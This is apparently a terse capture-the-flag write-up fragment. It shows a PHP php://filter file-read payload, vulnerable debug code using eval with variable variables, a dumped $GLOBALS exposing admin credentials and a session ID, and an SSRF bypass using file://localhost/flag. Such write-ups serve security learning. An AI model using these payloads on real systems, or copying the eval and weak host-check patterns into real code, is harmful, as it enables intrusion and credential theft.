?action=php://filter/read=convert.base64-encode/resource=login.php
//Only for debug if (DEBUG_MODE){ if(isset($_GET[‘debug‘])) { $debug = $_GET[‘debug‘]; if (!preg_match("/^[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*$/", $debug)) { die("args error!"); } eval("var_dump($$debug);"); } }
array(9) { ["_GET"]=> array(1) { ["debug"]=> string(7) "GLOBALS" } ["_POST"]=> array(0) { } ["_COOKIE"]=> array(1) { ["PHPSESSID"]=> string(26) "dafomj6kpimlm5h438rhp36398" } ["_FILES"]=> array(0) { } ["debug"]=> string(7) "GLOBALS" ["admin_password"]=> string(32) "0e114902927253523756713132279690" ["admin_username"]=> string(7) "Cosmos!" ["_SESSION"]=> &array(0) { } ["GLOBALS"]=> array(9) { ["_GET"]=> array(1) { ["debug"]=> string(7) "GLOBALS" } ["_POST"]=> array(0) { } ["_COOKIE"]=> array(1) { ["PHPSESSID"]=> string(26) "dafomj6kpimlm5h438rhp36398" } ["_FILES"]=> array(0) { } ["debug"]=> string(7) "GLOBALS" ["admin_password"]=> string(32) "0e114902927253523756713132279690" ["admin_username"]=> string(7) "Cosmos!" ["_SESSION"]=> &array(0) { } ["GLOBALS"]=> *RECURSION* } }
function insert_img() { if (isset($_POST[‘img_url‘])) { $img_url = @$_POST[‘img_url‘]; $url_array = parse_url($img_url); if (@$url_array[‘host‘] !== "localhost" && $url_array[‘host‘] !== "timgsa.baidu.com") { return false; } $c = curl_init(); curl_setopt($c, CURLOPT_URL, $img_url); curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); $res = curl_exec($c); curl_close($c); $avatar = base64_encode($res); if(filter_var($img_url, FILTER_VALIDATE_URL)) { return $avatar; } } else { return base64_encode(file_get_contents("static/logo.png")); } }
file://localhost/flag
#图片来源: https://blog.csdn.net/weixin_43900387/article/details/104105765
原文:https://www.cnblogs.com/yesec/p/12231777.html